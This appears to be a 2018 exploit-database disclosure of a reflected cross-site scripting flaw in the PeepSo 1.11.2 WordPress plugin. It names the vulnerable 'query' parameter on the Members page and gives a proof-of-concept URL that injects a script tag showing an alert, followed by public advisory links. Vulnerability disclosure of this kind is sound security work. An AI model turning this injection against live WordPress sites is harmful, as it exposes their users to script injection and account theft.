===================================================================================
    PeepSo v1.11.2 (WordPress Plugin) - Cross-Site Scripting Vulnerability in "Members" 
    ===================================================================================


____________________________________________________________________________________


# Exploit Title: PeepSo v1.11.2 (WordPress Plugin) - XSS Vulnerability in Members 

# Date: [11-09-2018]

# Category: Webapps

____________________________________________________________________________________


# Author: Socket_0x03 (Alvaro J. Gene)

# Email: Socket_0x03 (at) teraexe (dot) com

# Website: www.teraexe.com 

____________________________________________________________________________________


# Software Link: https://wordpress.org/plugins/peepso-core/

# Plugin: PeepSo

# Version: 1.11.2

# File: Members		

# Parameter: query

# Language: This application is available in English language.

# Plugin Description: PeepSo is a social network plugin for WordPress with different
  kinds of features, such as user profiles, user registration, and other features. 
  
____________________________________________________________________________________


#  Cross-Site Scripting Vulnerability: 

   http://www.website.com/wordpress/index.php/members/?blocked/&query="><script>alert(23)</script>

____________________________________________________________________________________


# References: 

   https://0day.today/exploit/31570
   https://cxsecurity.com/issue/WLB-2018110086
   https://seclists.org/bugtraq/2018/Nov/14
   https://packetstormsecurity.com/files/150267/WordPress-PeepSo-1.11.2-Cross-Site-Scripting.html